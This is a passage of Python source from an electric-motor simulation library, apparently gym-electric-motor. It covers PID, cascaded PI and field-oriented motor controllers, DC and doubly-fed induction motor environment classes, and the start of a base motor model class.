def reset(self, **__):
self._derivative_value = 0
class PIDController(PIController):
"""
This class performs discrete-time PID controller computation using the error signal and
proportional,Derivative and integral gain inputs. The error signal is the difference between the reference_idx
and the referenced_state.It outputs a weighted sum of the input error signal,its derivative and the integral of
the input error signal.
Valid for DC motor system
"""
def __init__(self, environment, k_p=10, k_i=0.01, k_d=1, controller_no=0, reference_idx=0):
super().__init__(environment, k_p, k_i, controller_no, reference_idx)
self._ref_dx = reference_idx
action_space = environment.action_space
assert type(action_space) is Box and type(
environment.physical_system) is DcMotorSystem, 'No suitable action space for PI Controller'
self._k_i = k_i
self._k_d = k_d
self._k_p = k_p
self._tau = environment.physical_system.tau
self._limits = environment.physical_system.limits
self._integrated_value = 0
self._derivative_value = 0
self._prev_error = 0
self._current_time = time.time()
self._prev_time = self._current_time
self._referenced_state_max = self._limits[self._referenced_state] \
* environment.physical_system.state_space.high[self._referenced_state]
self._referenced_state_min = self._limits[self._referenced_state] \
* environment.physical_system.state_space.low[self._referenced_state]
def control(self, state, reference):
diff = reference[self._ref_idx] - state[self._referenced_state]
de = diff - self._prev_error
self._derivative_value = de/self._tau
diff = reference[self._ref_idx] - state[self._referenced_state]
self._integrated_value += diff * self._tau
self._prev_error = diff
self._prev_time = self._current_time
if self._integrated_value > self._referenced_state_max: # check upper limit
self._integrated_value = self._referenced_state_max
else:
self._integrated_value = self._integrated_value - diff * self._tau # anti-reset windup
if self._integrated_value < self._referenced_state_min: # check lower limit
self._integrated_value = self._referenced_state_min
else:
self._integrated_value = self._integrated_value - diff * self._tau # anti-reset windup
return np.array([
max(
self._action_min,
min(
self._action_max,
(self._k_p * (reference[self._ref_dx] - state[self._referenced_state]))
+ (self._k_i * self._integrated_value) + (self._k_d * self._derivative_value)
)
)
])
def reset(self, **__):
self._integrated_value = 0
class DCCascadedPIController(Controller):
"""
cascade architecture has: two controllers (an inner secondary and outer primary controller)
two measurement/state variable sensors (an inner PV2 and outer PV1). A primary or master controller generates a control effort
that serves as the reference for a secondary or slave controller. That controller in turn uses the actuator to apply its control
effort directly to the secondary process. The secondary process then generates a secondary process variable that serves as
the control effort for the primary process. The geometry of this defines an inner loop involving the current controller and
an outer loop involving the speed controller. The inner loop functions like a traditional feedback control system with a
reference variable, a measured variable, and a controller acting on a process by means of an actuator. The outer loop does
the same except that it uses the entire inner loop as its actuator.
Valid for DC motor system only
"""
def __init__(self, environment, ref_idx=0):
assert type(environment.physical_system) is DcMotorSystem
self._omega_idx = np.argmax(environment.state_names == 'omega')
self._currents_idx = environment.physical_system.CURRENTS_IDX
self._voltages_idx = environment.physical_system.VOLTAGES_IDX
self._u_a_idx = self._voltages_idx[0]
self._i_a_idx = self._currents_idx[0]
self._u_sup = environment.physical_system.supply.u_nominal
if len(self._currents_idx) > 1:
self._i_e_idx = np.argmax(np.array(environment.state_names) == 'i_e')
else:
self._i_e_idx = np.argmax(np.array(environment.state_names) == 'i')
if len(self._voltages_idx) > 1:
self._u_e_idx = np.argmax(np.array(environment.state_names) == 'u_e')
else:
self._u_e_idx = None
self._limits = environment.physical_system.limits[environment.state_filter]
self._ref_idx = ref_idx
self._tau = environment.physical_system.tau
mp = environment.physical_system.electrical_motor.motor_parameter
t_motor = mp['l_a'] / mp['r_a']
t_t = 3 / 2 * self._tau
r_motor = mp['r_a']
self._i_a_max = 0
self._i_a_min = 0
self._u_a_max = 0
self._u_a_min = 0
self._integrated_values = [0, 0]
self._converter_voltages = environment.physical_system.converter.voltages
self._i_a_max = self._limits[self._i_a_idx] * environment.physical_system.state_space.high[self._i_a_idx]
self._i_a_min = self._limits[self._i_a_idx] * environment.physical_system.state_space.low[self._i_a_idx]
if 'psi_e' in mp.keys():
self._psi_e = mp['psi_e']
self._i_e_max_prime = None
elif 'l_e_prime' in mp.keys():
self._psi_e = None
self._i_e_max_prime = self._limits[self._currents_idx[-1]] * mp['l_e_prime']
else:
raise Exception('Motor Parameter Error. No psi_e and no l_e_prime entry found in motor parameters')
self._u_a_max = self._limits[self._u_a_idx] * environment.physical_system.state_space.high[self._u_a_idx]
self._u_a_min = self._limits[self._u_a_idx] * environment.physical_system.state_space.low[self._u_a_idx]
# compute motor type specific parameter
# use inner_ and outer_gain_adjustment to adjust the integral part gains for better control behaviour
# Gains chosen as given in "Elektrische Antriebe - Regelung von Antriebssystemen", <NAME>, 2009
if type(environment.physical_system.electrical_motor) == DcPermanentlyExcitedMotor:
inner_gain_adjustment = 1e-3
outer_gain_adjustment = 1e-3
elif type(environment.physical_system.electrical_motor) == DcSeriesMotor:
t_motor = (mp['l_a'] + mp['l_e']) / (mp['r_a'] + mp['r_e'])
r_motor = (mp['r_a'] + mp['r_e'])
inner_gain_adjustment = 1
outer_gain_adjustment = 1
elif type(environment.physical_system.electrical_motor) == DcExternallyExcitedMotor:
inner_gain_adjustment = 1E-4
outer_gain_adjustment = 1E-3
elif type(environment.physical_system.electrical_motor) == DcShuntMotor:
inner_gain_adjustment = 1E-2
outer_gain_adjustment = 1
else:
raise Exception('Unknown Motor')
# set up gains for the controller
# Integral gains are multiplied by the sampling time to simplify the computation during control
t_sigma = min(t_motor, t_t)
t_1 = max(t_motor, t_t)
v_s = 1 / r_motor
# Integral Inner loop
self._k_i_i = 1 / (2 * t_sigma * v_s) * self._tau * inner_gain_adjustment
# Proportional Inner loop
self._k_p_i = t_1 / (2 * t_sigma * v_s)
# Integral Outer loop
j = environment.physical_system.mechanical_load.j_total
self._k_i_o = (
j / (32 * t_sigma ** 2)
* self._tau * outer_gain_adjustment
)
# Proportional Outer loop
self._k_p_o = j / (4 * t_sigma)
def control(self, state, reference):
# denormalize quantities
omega = state[self._omega_idx] * self._limits[self._omega_idx]
omega_ref = reference[self._ref_idx] * self._limits[self._omega_idx]
i_a = state[self._i_a_idx] * self._limits[self._i_a_idx]
psi_e = self._psi_e or state[self._i_e_idx] * self._i_e_max_prime
# outer control loop
d_omega = omega_ref - omega
if psi_e != 0:
temp = self._integrated_values[0] + d_omega * self._k_i_o / psi_e # integral part
i_a_des = temp + d_omega * self._k_p_o / psi_e
else:
i_a_des = math.copysign(1, d_omega) * self._i_a_max
temp = self._integrated_values[0]
# hold current constraints, anti wind-up
if i_a_des > self._i_a_max or i_a_des < self._i_a_min:
i_a_des = min(max(i_a_des, self._i_a_min), self._i_a_max)
else:
self._integrated_values[0] = temp
d_i_a = i_a_des - i_a
# inner control loop
temp = self._integrated_values[1] + d_i_a * self._k_i_i # integral part
d_u_a = temp + d_i_a * self._k_p_i
u_a_0 = omega * psi_e
u_a = d_u_a + u_a_0
# hold voltage limits, anti wind-up
if u_a > self._u_a_max or u_a < self._u_a_min:
u_a = min(max(u_a, self._u_a_min), self._u_a_max)
else:
self._integrated_values[1] = temp
# normalize the desired output voltage to a duty cycle referring to the supply voltage
# Assumption: u_sup = u_N is made
des_duty_cycle = u_a / self._limits[self._u_a_idx]
# Voltage compensation
u_sup_avg = (self._u_sup * self._tau) / self._tau
des_duty_cycle = des_duty_cycle * (u_sup_avg / self._u_sup)
duty_cycle = min(
max(des_duty_cycle, self._u_a_min / self._limits[self._u_a_idx]),
self._u_a_max / self._limits[self._u_a_idx])
return np.array([duty_cycle])
class FOCController(Controller):
"""
The following FOC is used to control AC three-phase permanent magnet motors. The stator currents of a three-phase AC electric motor are identified
as two orthogonal components that can be visualized with a vector. One component defines the magnetic flux of the motor, the other the torque.
The control system of the drive calculates the corresponding current component references from the flux and torque references given
by the drive's speed control.
"""
def __init__(self, environment, ref_idx=0, weight=1, dq_decoupling=False):
assert type(environment.physical_system) is SynchronousMotorSystem
self._dq_decoupling = dq_decoupling # Can be turned ON
self._ref_idx = ref_idx
self._weight = weight
self._omega_idx = np.argmax(np.array(environment.state_names) == 'omega')
self._currents_idx = np.zeros(2, dtype=int)
self._currents_idx[0] = np.argmax(np.array(environment.state_names) == 'i_sq')
self._currents_idx[1] = np.argmax(np.array(environment.state_names) == 'i_sd')
self._voltages_idx = np.zeros(2, dtype=int)
self._voltages_idx[0] = np.argmax(np.array(environment.state_names) == 'u_sq')
self._voltages_idx[1] = np.argmax(np.array(environment.state_names) == 'u_sd')
self._epsilon_idx = np.argmax(np.array(environment.state_names) == 'epsilon')
self._limits = environment.physical_system.limits[environment.state_filter]
self._tau = environment.physical_system.tau
t32 = environment.physical_system.electrical_motor.t_32
q = environment.physical_system.electrical_motor.q
t23 = environment.physical_system.electrical_motor.t_23
q_inv = environment.physical_system.electrical_motor.q_inv
self._forward_transformation = lambda quantities, eps: q_inv(t23(quantities), eps)[::-1]
self._backward_transformation = (
lambda quantities, eps: t32(q(quantities[::-1], eps))
)
self._motor_parameter = environment.physical_system.electrical_motor.motor_parameter
mp = self._motor_parameter
# current controller i_d
t_motor_d = mp['l_d'] / mp['r_s']
tau = environment.physical_system.tau
t_t = 3 / 2 * tau
t_1_d = max(t_motor_d, t_t)
t_sigma_d = min(t_motor_d, t_t)
v_s_d = 1 / mp['r_s']
# current controller i_q
t_motor_q = mp['l_q'] / mp['r_s']
t_1_q = max(t_motor_q, t_t)
t_sigma_q = min(t_motor_q, t_t)
v_s_q = 1 / mp['r_s']
# outer speed controller
t_2 = 2 * t_sigma_q
t_1_s = environment.physical_system.mechanical_load.j_total
v_s_s = 3 / 2 * mp['p'] * mp['psi_p']
self._k_i_t = 2 * t_1_s / v_s_s * tau # integral gain speed controller.
self._k_p_t = t_1_s / (2 * t_2 * v_s_s) # prop. gain speed controller
self._k_i_d = 1 / (2 * t_sigma_d * v_s_d) * tau # integral gain i_sd controller.
self._k_p_d = t_1_d / (2 * t_sigma_d * v_s_d) # prop. gain i_sd controller
self._k_i_q = 1 / (2 * t_sigma_q * v_s_q) * tau # integral gain i_sq controller.
self._k_p_q = t_1_q / (2 * t_sigma_q * v_s_q) # prop. gain i_sq controller
# specify max values for normalisation and anti wind up
# an anti wind up scheme is necessary for good control behaviour to limit the integral parts in case of
# limit violations of the desired input voltage
# maximum speed without flux weakening
self._omega_1 = (
self._limits[self._voltages_idx][0] / mp['l_q'] / np.sqrt(self._limits[self._currents_idx][0]) ** 2
+ mp['psi_p'] ** 2 / mp['l_q'] ** 2
)
self._integrated_values = [0, 0, 0]
def reset(self):
self._integrated_values = [0, 0, 0]
def control(self, state, reference):
"""
Field oriented control from the lecture "controlled three phase drives, chapter 5"
"""
# extract quantities from state
mp = self._motor_parameter
omega = state[self._omega_idx] * self._limits[self._omega_idx]
omega_ref = reference[self._ref_idx] * self._limits[self._omega_idx]
# u = state[self._voltages_idx] * self._limits[self._voltages_idx]
epsilon = state[self._epsilon_idx] * self._limits[self._epsilon_idx]
i_qd = state[self._currents_idx] * self._limits[self._currents_idx]
# compute u_d_0 and u_q_0
u_d_0 = omega * mp['l_q'] * i_qd[0]
u_q_0 = omega * (mp['psi_p'] + mp['l_d'] * i_qd[1])
d_omega = omega_ref - omega
# compute T* (Torque reference) and i*_sq (q-axis current reference)
temp = self._integrated_values[0] + d_omega * self._k_i_t # integral part
t_des = temp + d_omega * self._k_p_t # proportional part
i_sq_des = 2 * t_des / (3 * mp['p'] * mp['psi_p'])
# anti wind-up
if i_sq_des > self._limits[self._currents_idx[0]] * self._weight \
or i_sq_des < -self._limits[self._currents_idx[0]] * self._weight:
i_sq_des = min(
max(i_sq_des, -self._limits[self._currents_idx[0]] * self._weight),
self._limits[self._currents_idx[0]] * self._weight
)
else:
self._integrated_values[0] = temp
if abs(omega_ref) < self._omega_1:
i_sd_des = 0
else:
i_sd_des = (
(self._limits[self._voltages_idx[0]] / omega_ref) ** 2
- (mp['l_q'] * self._limits[self._currents_idx[0]]) ** 2 - mp['psi_p'] ** 2
/ (2 * mp['psi_p'] * mp['l_d']))
# transform back to abc-domain
currents = self._backward_transformation((i_sq_des, i_sd_des), epsilon)
# test if current limits are violated
if np.max(np.abs(currents)) > self._limits[self._currents_idx[0]]:
clipping = self._limits[self._currents_idx[0]]
currents = np.clip(currents, -clipping, clipping)
array = self._forward_transformation(currents, epsilon)
i_sd_des = array[1]
i_sq_des = array[0]
# compute du*_sq, du*_sd
d_i_sd = i_sd_des - i_qd[1]
d_i_sq = i_sq_des - i_qd[0]
temp_u_sd = self._integrated_values[1] + d_i_sd * self._k_i_d # integral part
temp_u_sq = self._integrated_values[2] + d_i_sq * self._k_i_q # integral part
d_u_sd_des = temp_u_sd + d_i_sd * self._k_p_d
d_u_sq_des = temp_u_sq + d_i_sq * self._k_p_q
# anti-wind-up u_sd
if d_u_sd_des > self._limits[self._voltages_idx[0]] * self._weight - u_d_0 or \
d_u_sd_des < -self._limits[self._voltages_idx[0]] * self._weight - u_d_0:
d_u_sd_des = np.clip(d_u_sd_des, -self._limits[self._voltages_idx[0]] * self._weight - u_d_0,
self._limits[self._voltages_idx[0]] * self._weight - u_d_0)
else:
self._integrated_values[1] = temp_u_sd
# anti-wind-up u_sq
if d_u_sq_des > self._limits[self._voltages_idx[0]] * self._weight - u_q_0 or \
d_u_sq_des < -self._limits[self._voltages_idx[0]] * self._weight - u_q_0:
d_u_sq_des = np.clip(d_u_sq_des, -self._limits[self._voltages_idx[0]] * self._weight - u_q_0,
self._limits[self._voltages_idx[0]] * self._weight - u_q_0)
else:
self._integrated_values[2] = temp_u_sq
# compute u*_sq, u*_sd, epsilon + d_epsilon due to delay of the controller
u_sd_des = u_d_0 + d_u_sd_des
u_sq_des = d_u_sq_des + u_q_0
epsilon_shift = epsilon + 3 / 2 * self._tau * omega
# If we require dq-decoupling at higher speeds, the below block can be executed
if self._dq_decoupling:
u_sd_des = u_sd_des - u_d_0
u_sq_des = u_sq_des + u_q_0
else:
u_sd_des = u_sd_des
u_sq_des = u_sq_des
# from d/q to alpha/beta and a/b/c
u_qd_des = np.array([u_sq_des, u_sd_des])
# voltages = self._backward_transformation(u_qd_des, epsilon_shift)
# normalise inputs
result = np.clip(u_qd_des / self._limits[self._voltages_idx[0]], -1, 1)
return result
class zero_voltage_injection:
"""
The below class is implementation of zero voltage switching.
Zero Voltage Switching enables “soft switching”, avoiding the switching losses that are typically
incurred during conventional PWM operation and timing.Hence overall the voltage utilization is increased.
"""
def __init__(self, environment, state_idx=None, ref_idx=0):
self._omega_idx = environment.physical_system.OMEGA_IDX
self._currents_idx = environment.physical_system.CURRENTS_IDX
self._voltages_idx = environment.physical_system.VOLTAGES_IDX
self._limits = environment.physical_system.limits
self._tau = environment.physical_system.tau
q = environment.physical_system.electrical_motor.q
t23 = environment.physical_system.electrical_motor.t_23
self._epsilon_idx = environment.physical_system.EPSILON_IDX
self._limits = environment.physical_system.limits
t32 = environment.physical_system.electrical_motor.t_3
self._ref_idx = ref_idx
self._referenced_state = state_idx or np.argmax(environment.reference_generator.referenced_states)
q_inv = environment.physical_system.electrical_motor.q_inv
self._forward_transformation = lambda quantities, eps: q_inv(t23(quantities), eps)[::-1]
self._backward_transformation = (
lambda quantities, eps: t32(q(quantities[::-1], eps))
)
self._motor_parameter = environment.physical_system.electrical_motor.motor_parameter
def control(self, state):
i = state[self._currents_idx] * self._limits[self._currents_idx]
epsilon = state[self._epsilon_idx] * self._limits[self._epsilon_idx]
i_qd = self._forward_transformation(i, epsilon)
mp = self._motor_parameter
omega = state[self._omega_idx] * self._limits[self._omega_idx]
u_d_0 = omega * mp['l_q'] * i_qd[0]
u_q_0 = omega * (mp['psi_p'] + mp['l_d'] * i_qd[1])
u_a, u_b, u_c = self._backward_transformation((u_q_0, u_d_0), epsilon)
voltages = [u_a, u_b, u_c]
u_o = 1 / 2 * (max(voltages) + min(voltages))
voltages[0] = voltages[0] - u_o
voltages[1] = voltages[1] - u_o
voltages[2] = voltages[2] - u_o
result = np.clip(voltages / self._limits[self._voltages_idx[0]], -1, 1)
return result
_controllers = {
'on_off': OnOffController,
'three_point': ThreePointController,
'p_controller': PController,
'i_controller': IController,
'pi_controller': PIController,
'pid_controller': PIDController,
'd_controller': DController,
'cascaded_pi': DCCascadedPIController,
'foc_controller': FOCController,
}
```
#### File: envs/gym_dcm/dc_extex_motor_env.py
```python
from ...core import ElectricMotorEnvironment
from ...physical_systems.physical_systems import DcMotorSystem
from ...reference_generators import WienerProcessReferenceGenerator
from ...reward_functions import WeightedSumOfErrors
class DcExternallyExcitedMotorEnvironment(ElectricMotorEnvironment):
def __init__(self, motor='DcExtEx', reward_function=None, reference_generator=None, physical_system=None,
constraints=('i_a', 'i_e'), **kwargs):
"""
Args:
motor(ElectricMotor): Electric Motor used in the PhysicalSystem
reward_function(RewardFunction): Reward Function for the environment
reference_generator(ReferenceGenerator): Reference Generator for the environment
kwargs(dict): Further kwargs to pass to the superclass and the submodules
"""
physical_system = physical_system or DcMotorSystem(motor=motor, **kwargs)
reference_generator = reference_generator or WienerProcessReferenceGenerator(**kwargs)
reward_function = reward_function or WeightedSumOfErrors(**kwargs)
super().__init__(
physical_system, reference_generator=reference_generator, reward_function=reward_function,
constraints=constraints, **kwargs
)
class DiscDcExternallyExcitedMotorEnvironment(DcExternallyExcitedMotorEnvironment):
"""
Description:
Environment to simulate a discretely controlled externally excited DC Motor
Key:
`DcExtExDisc-v1`
Default Modules:
Physical System:
SCMLSystem/DcMotorSystem with:
| IdealVoltageSupply
| DiscDoubleConverter(subconverters=('Disc-4QC', 'Disc-1QC'))
| DcExternallyExcitedMotor
| PolynomialStaticLoad
| GaussianWhiteNoiseGenerator
| EulerSolver
| tau=1e-5
Reference Generator:
WienerProcessReferenceGenerator
Reference Quantity. 'omega'
Reward Function:
WeightedSumOfErrors(reward_weights= {'omega': 1 })
Visualization:
ElectricMotorVisualization (Dummy for no Visualization)
State Variables:
``['omega' , 'torque', 'i_a', 'i_e', 'u_a', 'u_e', 'u_sup']``
Observation Space:
Type: Tuple(State_Space, Reference_Space)
State Space:
Box(low=[-1, -1, -1, -1, -1, -1, 0], high=[1, 1, 1, 1, 1, 1, 1])
Reference Space:
Box(low=[-1], high=[1])
Action Space:
Type: Discrete(8)
Starting State:
Zeros on all state variables.
Episode Termination:
Termination if current limits are violated. The terminal reward -10 is used as reward.
(Have a look at the reward functions.)
"""
def __init__(self, tau=1e-5, converter='Disc-Multi', subconverters=('Disc-4QC', 'Disc-1QC'), **kwargs):
# Docstring in Base Class
super().__init__(tau=tau, converter=converter, subconverters=subconverters, **kwargs)
class ContDcExternallyExcitedMotorEnvironment(DcExternallyExcitedMotorEnvironment):
"""
Description:
Environment to simulate a continuously controlled externally excited DC Motor
Key:
`DcExtExCont-v1`
Default Modules:
Physical System:
SCMLSystem/DcMotorSystem with:
| IdealVoltageSupply
| ContDoubleConverter(subconverters=('Cont-4QC', 'Cont-1QC'))
| DcExternallyExcitedMotor
| PolynomialStaticLoad
| GaussianWhiteNoiseGenerator
| EulerSolver.
| tau=1e-4
Reference Generator:
WienerProcessReferenceGenerator
Reference Quantity. 'omega'
Reward Function:
WeightedSumOfErrors(reward_weights= {'omega': 1 })
Visualization:
ElectricMotorVisualization (Dummy for no Visualization)
State Names:
``['omega' , 'torque', 'i_a', 'i_e', 'u_a', 'u_e', 'u_sup']``
Observation Space:
Type: Tuple(State_Space, Reference_Space)
State Space:
Box(low=[-1, -1, -1, -1, -1, -1, 0], high=[1, 1, 1, 1, 1, 1, 1])
Reference Space:
Box(low=[-1], high=[1])
Action Space:
Type: Box(low=[-1,0], high=[1,1])
Starting State:
Zeros on all state variables.
Episode Termination:
Termination if current limits are violated. The terminal reward -10 is used as reward.
(Have a look at the reward functions.)
"""
def __init__(self, tau=1e-4, converter='Cont-Multi', subconverters=('Cont-4QC', 'Cont-1QC'), **kwargs):
# Docstring in Base Class
super().__init__(tau=tau, converter=converter, subconverters=subconverters, **kwargs)
```
#### File: envs/gym_im/doubly_fed_induc_motor_env.py
```python
from ...core import ElectricMotorEnvironment
from ...physical_systems.physical_systems import DoublyFedInductionMotorSystem
from ...reference_generators import WienerProcessReferenceGenerator
from ...reward_functions import WeightedSumOfErrors
class DoublyFedInductionMotorEnvironment(ElectricMotorEnvironment):
def __init__(self, motor='DFIM', reward_function=None, reference_generator=None, **kwargs):
"""
Args:
motor(ElectricMotor): Electric Motor used in the PhysicalSystem
reward_function(RewardFunction): Reward Function for the environment
reference_generator(ReferenceGenerator): Reference Generator for the environment
kwargs(dict): Further kwargs tot pass to the superclass and the submodules
"""
physical_system = DoublyFedInductionMotorSystem(motor=motor, **kwargs)
reference_generator = reference_generator or WienerProcessReferenceGenerator(**kwargs)
reward_function = reward_function or WeightedSumOfErrors(**kwargs)
super().__init__(
physical_system, reference_generator=reference_generator, reward_function=reward_function, **kwargs
)
class DiscDoublyFedInductionMotorEnvironment(DoublyFedInductionMotorEnvironment):
"""
Description:
Environment to simulate a discretely controlled Doubly-Fed Induction Motor (SCIM).
Key:
`DFIMDisc-v1`
Default Modules:
Physical System:
SCMLSystem/DcMotorSystem with:
| IdealVoltageSupply
| DiscB6BridgeConverter
| PermanentMagnetSynchronousMotor
| PolynomialStaticLoad
| GaussianWhiteNoiseGenerator
| EulerSolver
| tau=1e-5
Reference Generator:
WienerProcessReferenceGenerator
Reference Quantity. 'omega'
Reward Function:
WeightedSumOfErrors(reward_weights= {'omega': 1 })
Visualization:
ElectricMotorVisualization (Dummy for no Visualization)
State Variables:
``['omega' , 'torque', 'i_sa', 'i_sb', 'i_sc', 'i_sd', 'i_sq', 'u_sa', 'u_sb', 'u_sc', 'u_sd', 'u_sq',``
``'i_ra', 'i_rb', 'i_rc', 'i_rd', 'i_rq', 'u_ra', 'u_rb', 'u_rc', 'u_rd', 'u_rq', 'epsilon', 'u_sup']``
Observation Space:
Type: Tuple(State_Space, Reference_Space)
State Space:
Box(low=[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 0],
high=[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
Reference Space:
Box(low=[-1], high=[1])
Action Space:
Type: MultiDiscrete([8, 8])
Reward:
.. math::
reward = (\omega - \omega^*) / (2 * \omega_{lim})
Starting State:
Zeros on all state variables.
Episode Termination:
Current limits (i_a ,i_b, i_c) are observed and the reference generation is continuous.
Therefore, an episode ends only, when current limits have been violated.
Limit Violation Reward:
.. math::
limit~violation~reward = -1 / (1- \gamma ) = -10 (Default: \gamma = 0.9)
u_sup and u_nominal must be the same
"""
def __init__(self, tau=1e-5, converter='Disc-Multi', subconverters=('Disc-B6C', 'Disc-B6C'), **kwargs):
super().__init__(tau=tau, converter=converter, subconverters=subconverters, **kwargs)
class ContDoublyFedInductionMotorEnvironment(DoublyFedInductionMotorEnvironment):
"""
Description:
Environment to simulate a continuously controlled Doubly-Fed Induction Motor (SCIM).
Key:
`DFIMCont-v1`
Default Modules:
Physical System:
SCMLSystem/DcMotorSystem with:
| IdealVoltageSupply
| ContinuousB6BridgeConverter
| PermanentMagnetSynchronousMotor
| PolynomialStaticLoad
| GaussianWhiteNoiseGenerator
| EulerSolver
| tau=1e-4
Reference Generator:
WienerProcessReferenceGenerator
Reference Quantity. 'omega'
Reward Function:
WeightedSumOfErrors(reward_weights= {'omega': 1 })
Visualization:
ElectricMotorVisualization (Dummy for no Visualization)
State Variables:
``['omega' , 'torque', 'i_sa', 'i_sb', 'i_sc', 'i_sd', 'i_sq', 'u_sa', 'u_sb', 'u_sc', 'u_sd', 'u_sq',``
``'i_ra', 'i_rb', 'i_rc', 'i_rd', 'i_rq', 'u_ra', 'u_rb', 'u_rc', 'u_rd', 'u_rq', 'epsilon', 'u_sup']``
Observation Space:
Type: Tuple(State_Space, Reference_Space)
State Space:
Box(low=[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 0],
high=[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
Reference Space:
Box(low=[-1], high=[1])
Action Space:
Type: Box(low=[-1, -1, -1, -1, -1, -1], high=[1, 1, 1, 1, 1, 1])
Reward:
.. math::
reward = (\omega - \omega^*) / (2 * \omega_{lim})
Starting State:
Zeros on all state variables.
Episode Termination:
Current limits (i_a ,i_b, i_c) are observed and the reference generation is continuous.
Therefore, an episode ends only, when current limits have been violated.
Limit Violation Reward:
.. math::
limit~violation~reward = -1 / (1- \gamma ) = -10 (Default: \gamma = 0.9)
u_sup and u_nominal must be the same
"""
def __init__(self, tau=1e-4, converter='Cont-Multi', subconverters=('Cont-B6C', 'Cont-B6C'), **kwargs):
super().__init__(tau=tau, converter=converter, subconverters=subconverters, **kwargs)
```
#### File: gym_electric_motor/physical_systems/electric_motors.py
```python
import numpy as np
import math
from scipy.stats import truncnorm
class ElectricMotor:
"""
Base class for all technical electrical motor models.
A motor consists of the ode-state. These are the dynamic quantities of its ODE.
For example:
ODE-State of a DC-shunt motor: `` [i_a, i_e ] ``
* i_a: Anchor circuit current
* i_e: Exciting circuit current
Each electric motor can be parametrized by a dictionary of motor parameters,
the nominal state dictionary and the limit dictionary.
Initialization is given by initializer(dict). Can be constant state value
or random value in given interval.
dict should be like:
{ 'states'(dict): with state names and initital values
'interval'(array like): boundaries for each state
(only for random init), shape(num states, 2)
'random_init'(str): 'uniform' or 'normal'
'random_params(tuple): mue(float), sigma(int)
Example initializer(dict) for constant initialization:
{ 'states': {'omega': 16.0}}
Example initializer(dict) for random initialization:
{ 'random_init': 'normal'}
"""
#: Parameter indicating if the class is implementing the optional jacobian function
HAS_JACOBIAN = False
#: CURRENTS_IDX(list(int)): Indices for accessing all motor currents.
CURRENTS_IDX = []
#: CURRENTS(list(str)): List of the motor currents names
CURRENTS = []
#: VOLTAGES(list(str)): List of the motor input voltages names
VOLTAGES = []
#: _default_motor_parameter(dict): Default parameter dictionary for the motor
_default_motor_parameter = {}
#: _default_nominal_values(dict(float)): Default nominal motor state array
_default_nominal_values = {}
#: _default_limits(dict(float)): Default motor limits (0 for unbounded limits)
_default_limits = {}
#: _default_initial_state(dict): Default initial motor-state values
#_default_initializer = {}
_default_initializer = {'states': {},
'interval': None,
'random_init': None,
'random_params': None}
#: _default_initial_limits(dict): Default limit for initialization
_default_initial_limits = {}
@property
def nominal_values(self):
"""
Readonly motors nominal values.
Returns:
dict(float): Current nominal values of the motor.
"""
return self._nominal_values
@property
def limits(self):
"""
Readonly motors limit state array. Entries are set to the maximum physical possible values
in case of unspecified limits.
Returns:
dict(float): Limits of the motor.
"""
return self._limits
@property
def motor_parameter(self):
"""
Returns:
dict(float): The motors parameter dictionary
"""
return self._motor_parameter
@property
def initializer(self):
"""
Returns:
dict: Motor initial state and additional initializer parameter
"""
return self._initializer
@property
def initial_limits(self):
"""
Returns:
dict: nominal motor limits for choosing initial values
"""
return self._initial_limits
def __init__(self, motor_parameter=None, nominal_values=None,
limit_values=None, motor_initializer=None, initial_limits=None,
**__):
"""
:param motor_parameter: Motor parameter dictionary. Contents specified
for each motor.
:param nominal_values: Nominal values for the motor quantities.
:param limit_values: Limits for the motor quantities.
:param motor_initializer: Initial motor states (currents)
('constant', 'uniform', 'gaussian' sampled from
given interval or out of nominal motor values)
:param initial_limits: limits for of the initial state-value
"""
motor_parameter = motor_parameter or {}
self._motor_parameter = self._default_motor_parameter.copy()
self._motor_parameter.update(motor_parameter)
limit_values = limit_values or {}
self._limits = self._default_limits.copy()
self._limits.update(limit_values)
nominal_values = nominal_values or {}
self._nominal_values = self._default_nominal_values.copy()
self._nominal_values.update(nominal_values)
motor_initializer = motor_initializer or {}
self._initializer = self._default_initializer.copy()
self._initializer.update(motor_initializer)
self._initial_states = {}
if self._initializer['states'] is not None:
self._initial_states.update(self._initializer['states'])
# intialize limits, in general they're not needed to be changed
# during training or episodes
initial_limits = initial_limits or {}
self._initial_limits = self._nominal_values.copy()
self._initial_limits.update(initial_limits)
# preventing wrong user input for the basic case
assert isinstance(self._initializer, dict), 'wrong initializer'
def electrical_ode(self, state, u_in, omega, *_):
"""
Calculation of the derivatives of each motor state variable for the given inputs / The motors ODE-System.
Args:
state(ndarray(float)): The motors state.
u_in(list(float)): The motors input voltages.
omega(float): Angular velocity of the motor
Returns:
ndarray(float): Derivatives of the motors ODE-system for the given inputs.
"""
raise NotImplementedError
def electrical_jacobian(self, state, u_in, omega, *_):
"""
Calculation of the jacobian of each motor ODE for the given inputs / The motors ODE-System.
Overriding this method is optional for each subclass. If it is overridden, the parameter HAS_JACOBIAN must also
be set to True. Otherwise, the jacobian will not be called.
Args:
state(ndarray(float)): The motors state.
u_in(list(float)): The motors input voltages.
omega(float): Angular velocity of the motor
Returns:
Tuple(ndarray, ndarray, ndarray):
[0]: Derivatives of all electrical motor states over all electrical motor states shape:(states x states)
[1]: Derivatives of all electrical motor states over omega shape:(states,)
[2]: Derivative of Torque over all motor states shape:(states,)
"""
pass
def initialize(self,
state_space,
state_positions,
**__):
"""
Initializes given state values. Values can be given as a constant or
sampled random out of a statistical distribution. Initial value is in
range of the nominal values or a given interval. Values are written in
initial_states attribute
Args:
state_space(gym.Box): normalized state space boundaries (given by
physical system)
state_positions(dict): indexes of system states (given by physical
system)
Returns:
"""
# for organization purposes
interval = self._initializer['interval']
random_dist = self._initializer['random_init']
random_params = self._initializer['random_params']
self._initial_states.update(self._default_initializer['states'])
if self._initializer['states'] is not None:
self._initial_states.update(self._initializer['states'])
# different limits for InductionMotor
if any(map(lambda state: state in self._initial_states.keys(),
['psi_ralpha', 'psi_rbeta'])):
nominal_values_ = [self._initial_limits[state]
for state in self._initial_states]
upper_bound = np.asarray(np.abs(nominal_values_), dtype=float)
# state space for Induction Envs based on documentation
# ['i_salpha', 'i_sbeta', 'psi_ralpha', 'psi_rbeta', 'epsilon']
